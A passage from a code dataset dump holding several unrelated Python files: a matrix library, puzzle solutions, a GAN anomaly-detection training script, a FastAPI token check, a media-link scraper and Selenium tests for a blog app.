other.diagonals)\n elif isinstance(other, PartialDiagonalMatrix):\n return DenseMatrix(self.asmatrix() + other.asmatrix())\n else:\n return NotImplemented\n\n\n def __matmul__(self, other: Union[MatrixBase, np.ndarray]) -> Union[MatrixBase, np.ndarray]:\n \"\"\" self @ other \"\"\"\n assert self.shape[1] == other.shape[0]\n assert isinstance(other, MatrixBase) or isinstance(other, np.ndarray)\n\n if isinstance(other, np.ndarray):\n dtype = np.dtype(type(self._diagonals[0] * other.ravel()[0]))\n if other.ndim == 1:\n res = np.zeros(self.shape[0], dtype=dtype)\n min_len = min(self._diagonals.size, other.size)\n res[0:min_len] = self._diagonals[0:min_len] * other[0:min_len]\n return res\n else:\n rest_dim = other.shape[1:]\n res = np.zeros((self.shape[0],) + rest_dim, dtype=dtype)\n min_len = min(self._diagonals.size, other.size)\n res[0:min_len, ...] = \\\n np.einsum('d,d...->d...', self._diagonals[0:min_len], other[0:min_len, ...], optimize=True)\n return res\n elif isinstance(other, DenseMatrix):\n return DenseMatrix(self._diagonals[:,None] * other.data)\n elif isinstance(other, DiagonalMatrix):\n min_size = min(self.shape[0], other.shape[1])\n return DiagonalMatrix(\n _vecprod(self._diagonals, other._diagonals, min_size),\n (self.shape[0], other.shape[1])\n )\n elif isinstance(other, PartialDiagonalMatrix):\n return DenseMatrix(self._diagonals[:,None] * other.asmatrix())\n elif isinstance(other, ScaledIdentityMatrix):\n return self @ other.to_diagonal_matrix()\n else:\n return NotImplemented\n\n def __str__(self) -> str:\n return \"DiagonalMatrix: \" + self.diagonals.__str__()\n\n\nclass PartialDiagonalMatrix(MatrixBase):\n \"\"\"\n Matrix that can be composed as\n A otimes I.\n \"\"\"\n def __init__(self, matrix: Union[np.ndarray, MatrixBase], rest_dims: tuple) -> None:\n assert matrix.ndim == 2\n self.matrix = asmatrixtype(matrix)\n self._matrix_cg = matrix.T.conj()\n self.rest_dims = rest_dims\n self.ndim = 2\n self.shape = (matrix.shape[0]*np.prod(rest_dims), matrix.shape[1]*np.prod(rest_dims))\n\n def hash(self) -> int:\n return matrix_hash(self.matrix)\n\n def asmatrix(self) -> np.ndarray:\n return np.einsum(\n 'IJ,ij->IiJj',\n self.matrix.asmatrix(),\n np.identity(np.prod(self.rest_dims)),\n optimize=True\n ).reshape(self.shape)\n\n def __neg__(self)->'PartialDiagonalMatrix':\n return -1.0 * self\n\n def inv(self) -> 'PartialDiagonalMatrix':\n return PartialDiagonalMatrix(self.matrix.inv(), self.rest_dims)\n\n @property\n def T(self) -> 'PartialDiagonalMatrix':\n return PartialDiagonalMatrix(self.matrix.T, self.rest_dims)\n\n def conjugate(self) -> 'PartialDiagonalMatrix':\n return PartialDiagonalMatrix(self.matrix.conjugate(), self.rest_dims)\n\n conj = conjugate\n\n def __matmul__(self, other) -> Union[np.ndarray, MatrixBase]:\n \"\"\" self @ other \"\"\"\n assert self.shape[1] == other.shape[0]\n assert isinstance(other, MatrixBase) or isinstance(other, np.ndarray)\n if isinstance(other, np.ndarray):\n return self.matvec(other)\n elif isinstance(other, PartialDiagonalMatrix) and self.rest_dims == other.rest_dims:\n return PartialDiagonalMatrix(self.matrix@other.matrix, self.rest_dims)\n else:\n return DenseMatrix(self.asmatrix() @ other.asmatrix())\n\n\n def __mul__(self, other) -> 'PartialDiagonalMatrix':\n if type(other) in [float, complex, np.float64, np.complex128]:\n return PartialDiagonalMatrix(self.matrix * other, self.rest_dims)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __add__(self, other) -> MatrixBase:\n assert isinstance(other, MatrixBase)\n assert self.shape == other.shape\n\n if isinstance(other, ScaledIdentityMatrix):\n return PartialDiagonalMatrix(\n self.matrix + ScaledIdentityMatrix(self.matrix.shape, other.coeff),\n self.rest_dims\n )\n else:\n return DenseMatrix(self.asmatrix() + other.asmatrix())\n\n\n def matvec(self, v: np.ndarray) -> np.ndarray:\n r\"\"\"\n (a \\otimes I) @ v\n v can be a vector or a tensor.\n In the latter case, the matrix applied to the first axis of v.\n \"\"\"\n return _matvec_impl(self.matrix, v, self.rest_dims)\n\n\ndef _matvec_impl(\n matrix: Union[MatrixBase, np.ndarray],\n v: np.ndarray,\n rest_dims: tuple\n ) -> np.ndarray:\n\n res_leading_dim = matrix.shape[0] * np.prod(rest_dims)\n res_shape = (0,) # type: Tuple[int,...]\n if v.ndim == 1:\n res_shape = (res_leading_dim,)\n else:\n res_shape = (res_leading_dim,) + v.shape[1:]\n\n v = v.reshape(matrix.shape[1], *rest_dims, -1)\n if isinstance(matrix, DiagonalMatrix):\n return cast(np.ndarray, matrix @ v).reshape(res_shape)\n elif isinstance(matrix, DenseMatrix):\n return np.tensordot(\n matrix.asmatrix(),\n v,\n axes=(-1,0)\n ).reshape(res_shape)\n elif isinstance(matrix, ScaledIdentityMatrix):\n return (matrix.coeff * v.ravel()).reshape(res_shape)\n else:\n raise RuntimeError(f\"Unsupported type{type(matrix)}!\")\n\ndef identity(n, dtype=np.float64) -> ScaledIdentityMatrix:\n \"\"\" Create an identity matrix \"\"\"\n n = int(n)\n assert isinstance(n, int), n\n return ScaledIdentityMatrix(n, dtype(1.0))\n\n\ndef matrix_hash(a) -> int:\n \"\"\" Compute hash of a matrix a\"\"\"\n if isinstance(a, np.ndarray):\n return hash(a.data.tobytes()) # This makes a copy\n elif np.isscalar(a):\n return hash(a)\n else:\n return a.hash()\n\ndef asmatrixtype(a) -> MatrixBase:\n assert isinstance(a, MatrixBase) or (isinstance(a, np.ndarray) and a.ndim==2)\n if isinstance(a, np.ndarray):\n return DenseMatrix(a)\n return a\n\n\ndef _vecprod(v1: np.ndarray, v2: np.ndarray, size=Optional[int]):\n \"\"\"\n Elementwise product of two vectors.\n If v1.size < size and v2.size, the result is padded on the right\n so that the returned array is size.\n \"\"\"\n assert isinstance(v1, np.ndarray)\n assert isinstance(v2, np.ndarray)\n min_size = min(v1.size, v2.size)\n res = v1[0:min_size] * v2[0:min_size]\n return _pad_by_zero(res, size)\n\ndef _pad_by_zero(arr: np.ndarray, size: int):\n assert arr.size <= size\n if arr.size == size:\n return arr\n res = np.zeros(size, dtype=arr.dtype)\n res[0:arr.size] = arr\n return res","repo_name":"SpM-lab/admmsolver","sub_path":"src/admmsolver/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":15453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70732507047","text":"import string\nimport sys\nimport time\nimport copy \n\nwith open(\"day24_i.txt\", \"r\") as f:\n map_ = [[c for c in l if c != '\\n'] for l in f.readlines()]\n\nclass Area:\n def __init__(self, map_):\n self.map = map_\n self.width = len(map_[0])\n self.height = len(map_)\n\n def show(self, pos=None):\n sys.stderr.write(\"AREA MAP\\n\\n\")\n for x, line in enumerate(self.map):\n sys.stderr.write(\"{:2d}\".format(x))\n for y, obj in enumerate(line):\n if pos is not None and pos[0] == x and pos[1] == y:\n sys.stderr.write(\"=\")\n else:\n sys.stderr.write(obj)\n sys.stderr.write(\"\\n\")\n sys.stderr.write(\"\\n\")\n\n def foreach(self, find_func):\n for y, line in enumerate(self.map):\n for x, obj in enumerate(line):\n find_func(x, y, obj)\n\n def get(self, pos):\n return self.map[pos[1]][pos[0]]\n\n def is_portal(self, pos):\n return self.get(pos) in string.ascii_lowercase\n\n def is_wall(self, pos):\n return self.get(pos) in string.ascii_uppercase\n\n def rank(self):\n r = [0]\n def _rank(x, y, obj):\n if obj == \"#\":\n r[0] += 2 ** (x + y * self.width)\n\n self.foreach(_rank)\n return r[0]\n\n def vicinity(self, pos):\n candidates = [\n (pos[0] + 1, pos[1]),\n (pos[0] - 1, pos[1]),\n (pos[0], pos[1] + 1),\n (pos[0], pos[1] - 1)\n ]\n return [p for p in candidates\n if p[0] >= 0\n and p[0] < self.width\n and p[1] >= 0\n and p[1] < self.height]\n\narea = Area(map_)\narea.show()\n\nt = 0\nranks = set() \nwhile True:\n print(t)\n #area.show()\n new_map = copy.deepcopy(area.map)\n\n if t % 1000 == 0:\n print(t)\n\n def life(x,y,obj):\n if obj == \"#\":\n neighs = area.vicinity((x,y))\n neighs_life = sum([1 for n in neighs if area.get(n) == \"#\"])\n\n if neighs_life == 1:\n new_map[y][x] = \"#\"\n else:\n new_map[y][x] = \".\"\n elif obj == \".\":\n neighs = area.vicinity((x,y))\n neighs_life = sum([1 for n in neighs if area.get(n) == \"#\"])\n\n if neighs_life == 1 or neighs_life == 2:\n new_map[y][x] = \"#\"\n else:\n new_map[y][x] = \".\"\n else:\n assert False, \"Unknown object\"\n\n area.foreach(life)\n\n area.map = new_map\n\n area.show()\n rating = area.rank()\n if rating in ranks:\n print(\"repeats !\")\n print(t)\n print(rating)\n break\n else:\n ranks |= {rating}\n #print(ranks)\n #time.sleep(0.5)\n t += 1\n","repo_name":"ey3ball/adventofcode2019","sub_path":"day24/day24_1.py","file_name":"day24_1.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71742744487","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nwith open('requirements.txt') as fp:\n install_requires = fp.read().split('\\n')\n\nsetup(\n name='human_pose_util',\n version='0.0.1',\n description='Human Pose Utility Functions',\n url='http://github.com/jackd/human_pose_util',\n author='Dominic Jack',\n author_email='thedomjack@gmail.com',\n license='MIT',\n packages=find_packages(),\n requirements=install_requires,\n zip_safe=True,\n)\n","repo_name":"jackd/human_pose_util","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"7437894361","text":"from bs4 import BeautifulSoup\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium import webdriver\r\nimport webbrowser\r\n\r\n\r\n\r\ndef get_url(url , option):\r\n chrome_options = Options()\r\n chrome_options.headless = True\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'\r\n chrome_options.add_argument(f'user-agent={user_agent}')\r\n\r\n browser = webdriver.Chrome(options=chrome_options)\r\n browser.get(url)\r\n soup = BeautifulSoup(browser.page_source , features='html5lib')\r\n\r\n if (option == 0):\r\n get_meta = soup.find('meta' , property='og:image')\r\n image_link = get_meta['content']\r\n return image_link\r\n elif (option == 1):\r\n get_meta = soup.find('meta' , property='og:video')\r\n video_link = get_meta['content']\r\n return video_link\r\n else:\r\n return None\r\n\r\n\r\nurl = input('Enter Your Url :')\r\nwhile True:\r\n option = int(input('Image [0]\\nVideo [1] : '))\r\n if (option == 1 or option == 0):\r\n break\r\n else:\r\n continue\r\n \r\n\r\nobject_url = get_url(url , option)\r\nwebbrowser.open(object_url , new=0 , autoraise=True)\r\n","repo_name":"DolenDeori/Photo_video_downloader_insta_fb","sub_path":"instapic_downloader.py","file_name":"instapic_downloader.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23356752149","text":"##import os\n##import subprocess\n##cmd = \"date\"\n##\n####returned_value = os.system(cmd)\n####print('returned value:', returned_value)\n##\n####returned_output = subprocess.check_output(cmd)\n####print('Current date is:', returned_output.decode(\"utf-8\"))\n\nfrom tkinter import Tk\nimport time\n\n\n\nM=[\"c\",\"b\",\"a\"]\n\nr = Tk()\nr.withdraw()\nr.clipboard_clear()\nr.clipboard_append(\"i\")\n\nr.update()\ntime.sleep(.2)\nr.update()\n\nr.destroy()\n\n\n\n","repo_name":"xanderrp2/RandomPractice","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5982876056","text":"# + ---------------- +\n# | IMPORT LIBRARIES |\n# + ---------------- +\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport torchvision.utils as v_utils\nimport torchvision.transforms as transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom model_drk import Generator\nfrom model_drk import Discriminator\nimport torchvision\nfrom utils import EarlyStopping, data_loader, weights_init\nimport argparse\nimport random\n\n\n\n# + ------- +\n# | SET GPU |\n# + ------- +\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\ndevice = torch.device(f'cuda:0' if torch.cuda.is_available() else 'cpu')\nprint(device)\n\n\n\n# + ------------- +\n# | SET ARGUMENTS |\n# + ------------- +\nparser = argparse.ArgumentParser(description='Arguments for AnoGAN model training')\nparser.add_argument('--random_seed', type = int, default = 42, help = 'Random seed')\nparser.add_argument('--epochs', type = int, default = 30, help = 'The number of epochs')\nparser.add_argument('--train_val_ratio', type = float, default = 0.2, help = 'Ratio between train and val dataset')\nparser.add_argument('--batch_size', type = int, default = 32, help = 'The size of batch')\nparser.add_argument('--time_step', type = int, default = 30, help = 'Timestep for temporalization of time-series data')\nparser.add_argument('--lr', type = int, default = 0.0002, help = 'Learning rate')\nparser.add_argument('--num_gpus', type = int, default = 1, help = 'The number of available GPUs')\nparser.add_argument('--num_workers', type = int, default = 0, help = 'The number of available workers')\nparser.add_argument('--nz', type = int, default = 100, help = 'Dimension of noise vector')\nparser.add_argument('--ngf', type = int, default = 64, help = 'Number of conv filters for generator')\nparser.add_argument('--ndf', type = int, default = 8, help = 'Number of conv filters for discriminator')\nparser.add_argument('--nc', type = int, default = 1, help = 'Number of channels for input image') ## color: 3 / gray: 1\nparser.add_argument('--beta1', type = float, default = 0.5, help = 'Parameters of Adam optimizer')\n\n### ----- args 에 위 내용 저장\n# args = parser.parse_args() ### Pycharm 에서 사용하는 경우의 Code\nargs = parser.parse_args(args=[]) ### Jupyter notebook 에서 사용하는 경우의 Code\n\n### ----- ��력받은 인자값 출력\nprint(\"##### Arguments #####\\n\")\nprint(\"random_seed: \", args.random_seed)\nprint(\"Epochs: \", args.epochs)\nprint(\"train_val_ratio: \", args.train_val_ratio)\nprint(\"batch_size: \", args.batch_size)\nprint(\"Learning rate: \", args.lr)\nprint(\"num_gpus: \", args.num_gpus)\nprint(\"num_workers: \", args.num_workers)\nprint(\"nz: \", args.nz)\nprint(\"ngf: \", args.ngf)\nprint(\"ndf: \", args.ndf)\nprint(\"nc: \", args.nc)\nprint(\"beta1: \", args.beta1)\n\n\n\n# + ------------------ +\n# | SET HYPERPARAMETER |\n# + ------------------ +\nparams ={\n \"epoch\": args.epochs,\n \"batch_size\": args.batch_size,\n \"learning_rate\": args.lr,\n \"num_gpus\": args.num_gpus,\n \"num_workers\": args.num_workers,\n \"nz\": args.nz,\n \"ngf\": args.ngf, \n \"ndf\": args.ndf, \n \"nc\": args.nc, \n \"beta1\": args.beta1\n}\n\n### ----- Secure reproducibility\nnp.random.seed(args.random_seed)\ntorch.manual_seed(args.random_seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nrandom.seed(args.random_seed)\n\n\n\n# + ---------------- +\n# | TARGET LADLE CAR |\n# + ---------------- +\ncars = ['car1', 'car2']\n\n\nfor idx, target_car in enumerate(cars):\n # + ----------------------------- +\n # | LOAD DATASET & SET DATALOADER |\n # + ----------------------------- +\n train_loader, test_loader = data_loader(target_car, params['batch_size'], params['num_workers'])\n\n\n\n # + ------------ +\n # | DEFINE MODEL |\n # + ------------ +\n ### ----- Put class objects on Multiple GPUs using\n ### ----- torch.nn.DataParallel(module, device_ids=None, output_device=None, dim=0)\n ### ----- device_ids: default all devices / output_device: default device 0\n ### ----- along with .cuda()\n generator = nn.DataParallel(Generator(params[\"nz\"], params[\"ngf\"], params[\"nc\"])).cuda()\n discriminator = nn.DataParallel(Discriminator(params[\"ndf\"], params[\"nc\"])).cuda()\n generator.apply(weights_init)\n discriminator.apply(weights_init)\n # generator = Generator()\n # discriminator = Discriminator()\n\n\n\n # + ----------------------------------------------------- +\n # | DEFINE LOSS FUNCTIONN, OPTIMIZER, LABLES FOR TRAINING |\n # + ----------------------------------------------------- +\n loss_func = nn.MSELoss()\n # loss_func = nn.BCELoss()\n gen_optim = torch.optim.Adam(\n generator.parameters(), \n lr=5*params[\"learning_rate\"],\n betas=(params[\"beta1\"], 0.999)\n ) ## Opimizer for generator\n dis_optim = torch.optim.Adam(\n discriminator.parameters(), \n lr=params[\"learning_rate\"],\n betas=(params[\"beta1\"], 0.999)\n ) ## Opimizer for discriminator\n # ones_label = Variable(torch.ones(batch_size, 1)).cuda() ## deprecated\n # zeros_label = Variable(torch.zeros(batch_size, 1)).cuda() ## deprecated\n # ones_label = torch.Tensor(torch.ones(batch_size, 1)).cuda()\n # zeros_label = torch.Tensor(torch.zeros(batch_size, 1)).cuda()\n\n\n\n # + -------------- +\n # | MODEL TRAINING |\n # + -------------- +\n ### ----- Load checkpoints\n # try:\n # generator.load_state_dict(torch.load('./saved_model/generator.pkl'))\n # discriminator.load_state_dict(torch.load('./saved_model/discriminator.pkl'))\n # print(\"\\n--------model restored--------\\n\")\n # except:\n # print(\"\\n--------model not restored--------\\n\")\n # pass\n gen_losses = []\n dis_losses = []\n\n min_gen_loss = 1000\n min_dis_loss = 1000\n\n ### ----- Train\n for i in range(params[\"epoch\"]):\n for j, (image, label) in enumerate(train_loader):\n # image = Variable(image).cuda() ## deprecated\n image = torch.Tensor(image).cuda()\n # print(image.size())\n batch_size = image.size()[0]\n # print(batch_size)\n\n # ones_label = Variable(torch.ones(batch_size, 1)).cuda() ## deprecated\n # zeros_label = Variable(torch.zeros(batch_size, 1)).cuda() ## deprecated\n ones_label = torch.Tensor(torch.ones(batch_size, 1)).cuda() ## torch.Size([batch_size, 1])\n zeros_label = torch.Tensor(torch.zeros(batch_size, 1)).cuda() ## torch.Size([batch_size, 1])\n\n ### ----- Generator\n gen_optim.zero_grad()\n\n z = Variable(init.normal(torch.Tensor(batch_size, 100), mean=0, std=0.1)).cuda() ## deprecated\n # z = torch.Tensor(init.normal_(torch.zeros(batch_size, 100), mean=0, std=0.1)).requires_grad_(requires_grad=True)\n gen_fake = generator.forward(z) ## Generate fake image\n dis_fake, _ = discriminator.forward(gen_fake) ## Discriminate generated fake image\n\n gen_loss = torch.sum(loss_func(dis_fake, ones_label)) ## fake classified as real\n gen_losses.append(gen_loss.detach().cpu().item())\n\n gen_loss.backward(retain_graph=True)\n gen_optim.step()\n\n \n\n ### ----- Discriminator\n dis_optim.zero_grad()\n\n z = Variable(init.normal(torch.Tensor(batch_size, 100), mean=0, std=0.1)).cuda() ## deprecated\n # z = torch.Tensor(init.normal_(torch.zeros(batch_size, 100), mean=0, std=0.1)).requires_grad_(requires_grad=True)\n gen_fake = generator.forward(z)\n dis_fake, _ = discriminator.forward(gen_fake)\n\n dis_real, _ = discriminator.forward(image) ## image.shape = torch.Size([32, 1, 28, 28])\n dis_loss = torch.sum(loss_func(dis_fake, zeros_label)) + torch.sum(loss_func(dis_real, ones_label))\n dis_losses.append(dis_loss.detach().cpu().item())\n\n dis_loss.backward()\n dis_optim.step()\n\n \n\n ### ----- Model save\n if j % 50 == 0:\n print(\"{}th iteration gen_loss: {} dis_loss: {}\".format(i, gen_loss.data, dis_loss.data))\n \n if min_dis_loss > dis_loss:\n min_dis_loss = dis_loss\n torch.save(generator.state_dict(), './model/' + target_car + '/generator.pkl') ## 경로에 '_' 포함 시 계속 경로 문제로 OSError 발생 (OSError: [Errno 22] Invalid argument)\n torch.save(discriminator.state_dict(), './model/' + target_car + '/discriminator.pkl')\n\n print(\"Model save!\")\n\n # v_utils.save_image(gen_fake.data[0:25], \"./result/gen_{}_{}.png\".format(i, j), nrow=5)\n\n # image_check(gen_fake.cpu())\n","repo_name":"jkc4416/Project_AnomalyDetection_AnoGAN","sub_path":"AnoGAN_drk.py","file_name":"AnoGAN_drk.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32133245677","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the maxXor function below.\ndef maxXor(arr, queries):\n ans = []\n trie = {} # dictionary in dictionary for binary tree of bits for every number in array\n # node copies from trie and is for further processing\n k = len(bin(max(arr+queries))) - 2 # longest binary length, 2 is for ob prefix\n for binumber in ['{:b}'.format(x).zfill(k) for x in arr]:\n node = trie # update node as trie was updated by setdefault\n #print(f'binumber is {binumber}')\n for bit in binumber:\n node = node.setdefault(bit, {}) # bc it is dict, it also changes trie\n #print(f'{trie}')\n for n in queries: # 3 7 2\n node = trie\n s = ''\n for bit in'{:b}'.format(n).zfill(k) : # 011,111,010\n #print(f'node {node}')\n reversebit = str(int(bit) ^ 1) # flipping the bits\n reversebit = reversebit if reversebit in node else bit\n s += reversebit\n node = node[reversebit] # go inside another tree\n ans.append(int(s, 2) ^ n) # convert from base 2 to integer\n return ans\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n m = int(input())\n\n queries = []\n\n for _ in range(m):\n queries_item = int(input())\n queries.append(queries_item)\n\n result = maxXor(arr, queries)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"Bidek56/HackerRank","sub_path":"Python/maxXor.py","file_name":"maxXor.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29141890363","text":"import pytest\r\nimport yaml\r\n\r\nfrom myenv.python_code1.calc import Calculator\r\n\r\nwith open(\"./pytest learning1/data.yaml\") as f:\r\n data = yaml.safe_load(f)['add']\r\n add_data = data['data']\r\n print(add_data)\r\n add_id = data['add_id']\r\n print(add_id)\r\n div_data = data['data']\r\n print(div_data)\r\n div_id = data ['div_id']\r\n print (div_id)\r\n\r\nclass TestCalc:\r\n def setup_class(self):\r\n print(\"开始计算\")\r\n self.calc = Calculator()\r\n\r\n def teardown_class(self):\r\n print(\"计算结束\")\r\n\r\n @pytest.mark.parametrize(\"a,b,expect\",add_data,add_id)\r\n def test_add(self, a, b, expect):\r\n result = self.calc.add(a, b)\r\n if isinstance(result, float):\r\n result = round(result, 2)\r\n assert result == expect\r\n\r\n @pytest.mark.parametrize(\"a,b,expect\",div_data,div_id)\r\n def test_div(self, a, b, expect):\r\n result = self.calc.div(a, b)\r\n if isinstance(result,float):\r\n result = round(result,2)\r\n assert result == expect\r\n\r\n","repo_name":"ruyu-yin/STE","sub_path":"test_cal1.py","file_name":"test_cal1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70500903","text":"from track.cli import tests, CLIRules\nfrom textwrap import dedent, wrap\n\n\ndef main():\n print(dedent('''\n ===============\n Available Tests\n ===============\n\n '''))\n\n for key in tests.AvailableTests:\n if not key:\n continue\n test = CLIRules.get_test(key)\n docstring = test.__doc__.strip()\n if not docstring.startswith(' '):\n # Guess what the right indentation is.\n docstring = ' '*2+docstring\n\n s = dedent(\"\"\"\n {name}\n {hr}\n\n {desc}\n \"\"\").format(name=key, desc=dedent(docstring), hr='-'*len(key))\n print(dedent(s))\n\n\nmain()\n","repo_name":"miracle2k/track0","sub_path":"generate-tests-doc.py","file_name":"generate-tests-doc.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"557904634","text":"import typing as tp\n\nimport os\nfrom fastapi.requests import Request\nfrom jose import jwt\nfrom jose.exceptions import JWTError\n\nfrom utils.exceptions.api_error import ApiError\nfrom logic.auth_logic import AuthService\n\n\nclass RefreshTokenBackend:\n _auth_service: AuthService\n\n def __init__(\n self,\n auth_service: AuthService\n ) -> None:\n self._auth_service = auth_service\n\n async def __call__(self, request: Request) -> Request:\n \"\"\"\n Проверяет валидность токенов.\n Вернет параметр request обратно в контроллер,\n Если токены валидны, иначе вызавет исключение.\n \"\"\"\n refresh_token = request.cookies.get('refresh_token', None)\n if refresh_token is None:\n raise ApiError.forbidden('Токен не был получен!')\n\n access_token = request.headers.get('authorization', None)\n if access_token is None:\n raise ApiError.unauthorized(message='Токен не найден!')\n\n refresh_token_is_valid = await self._check_refresh_token(\n request=request,\n access_token=access_token,\n refresh_token=refresh_token\n )\n\n if not refresh_token_is_valid:\n raise ApiError.forbidden('Токен невалиден!')\n\n return request\n\n async def _check_refresh_token(\n self,\n request: Request,\n refresh_token: str,\n access_token: str\n ) -> bool:\n \"\"\"\n Проверяет валидность refresh токена. \n Если токен валидный, установит в параметр request словарь\n С id пользвателя, и значением токена и вернет True.\n \"\"\"\n access_token_slice_start, access_token_slice_end = map(\n int, \n os.getenv('ACCESS_TOKEN_SLICE_FOR_REFRESH_TOKEN').split()\n )\n access_token_part = access_token[access_token_slice_start:access_token_slice_end]\n try:\n payload = jwt.decode(\n refresh_token,\n os.getenv('TOKEN_SECRET_KEY') + access_token_part,\n algorithms=[os.getenv('TOKEN_ALGORITHM')]\n )\n except JWTError:\n return False\n\n user_id = payload.get('user_id', None)\n if user_id is None:\n return False\n\n token_in_db = await self._auth_service.check_token_in_db(\n user_id=user_id, \n token=refresh_token\n )\n\n if not token_in_db:\n return False\n\n request.state.token_data = {\n 'token': refresh_token, \n 'payload': payload.copy()\n }\n\n return True\n","repo_name":"KotovshchikovAndrey/Coursework-microservices","sub_path":"microservices/auth_service/app/api/dependencies/refresh_token_backend.py","file_name":"refresh_token_backend.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12335851806","text":"# selenium\nfrom selenium import webdriver\n# webdriver-manager\nfrom webdriver_manager.chrome import ChromeDriverManager\n# webdriver wait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n# time for time.sleep\nimport time\n# login function\nfrom login_function import login\n# keyboard keys\nfrom selenium.webdriver.common.keys import Keys\n# built-in colors\nfrom selenium.webdriver.support.color import Color\n# data for login and registration\nfrom login_data import registered\n\n#\nclass TestConduit(object):\n def setup(self):\n self.browser = webdriver.Chrome(ChromeDriverManager().install())\n URL = \"http://localhost:1667/\"\n self.browser.get(URL)\n\n def teardown(self):\n self.browser.quit()\n\n # test cookies\n def test_check_cookies(self):\n # find elements\n cookie_panel = self.browser.find_element_by_id('cookie-policy-panel')\n decline_cookie_btn = self.browser.find_element_by_xpath('//button/div[contains(text(), \"I decline!\")]')\n accept_cookie_btn = self.browser.find_element_by_xpath('//button/div[contains(text(), \"I accept!\")]')\n # assert elements displayed\n assert cookie_panel.is_displayed()\n assert decline_cookie_btn.is_displayed()\n assert accept_cookie_btn.is_displayed()\n # test accept button\n accept_cookie_btn.click()\n # wait until cookie panel disappear\n WebDriverWait(self.browser, 2).until_not(EC.presence_of_element_located((By.ID, 'cookie-policy-panel')))\n # try to find cookie panel again\n cookie_panel = self.browser.find_elements_by_id('cookie-policy-panel')\n # assert \"cookie panel list\" len is 0\n assert len(cookie_panel) == 0\n # refresh page\n self.browser.refresh()\n # try to find cookie panel again\n cookie_panel = self.browser.find_elements_by_id('cookie-policy-panel')\n # assert \"cookie panel list\" len is 0 --> it's not appear on the page after refresh\n assert len(cookie_panel) == 0\n\n # end of test cookies\n\n # test registration\n def test_registration(self):\n # navigate to register page\n main_register_btn = self.browser.find_element_by_xpath('//a[@href=\"#/register\"]')\n main_register_btn.click()\n # find elements\n username_input = self.browser.find_element_by_xpath('//input[@placeholder=\"Username\"]')\n email_input = self.browser.find_element_by_xpath('//input[@placeholder=\"Email\"]')\n password_input = self.browser.find_element_by_xpath('//input[@type=\"password\"]')\n sign_up_btn = self.browser.find_element_by_xpath('//button[contains(text(), \"Sign up\")]')\n # asserts: the inputs are available\n assert username_input.is_enabled()\n assert email_input.is_enabled()\n assert password_input.is_enabled()\n # fill inputs with data (from login_data)\n username_input.send_keys(registered['username'])\n email_input.send_keys(registered['email'])\n password_input.send_keys(registered['password'])\n # send data\n sign_up_btn.click()\n # wait for error message\n error = WebDriverWait(self.browser, 3).until(\n EC.presence_of_element_located((By.XPATH, '//div[text()=\"Email already taken. \"]')))\n # assert error message displayed\n assert error.is_displayed()\n\n # end of test registration\n\n # test login\n def test_login(self):\n # navigate to login page\n main_login_btn = self.browser.find_element_by_xpath('//a[@href=\"#/login\"]')\n main_login_btn.click()\n # find elements\n email_input = self.browser.find_element_by_xpath('//input[@placeholder=\"Email\"]')\n password_input = self.browser.find_element_by_xpath('//input[@type=\"password\"]')\n sign_in_btn = self.browser.find_element_by_xpath('//button[contains(text(), \"Sign in\")]')\n # assert the inputs are available\n assert email_input.is_enabled()\n assert password_input.is_enabled()\n # fill the inputs with data (from login_data)\n email_input.send_keys(registered['email'])\n password_input.send_keys(registered['password'])\n # send data\n sign_in_btn.click()\n # wait for loading the navbar with name\n time.sleep(1)\n # find navbar\n navbar = self.browser.find_element_by_xpath('//nav')\n # assert profile_name appear on the navbar\n assert registered['username'] in navbar.text\n # assert we got redirected to the main page\n assert self.browser.current_url == 'http://localhost:1667/#/'\n\n # end of test login\n\n # test write new article\n def test_new_article(self):\n # run login function\n login(self)\n # navigate to new article page\n main_new_article_btn = self.browser.find_element_by_xpath('//a[@href=\"#/editor\"]')\n main_new_article_btn.click()\n time.sleep(1)\n # find elements\n title = 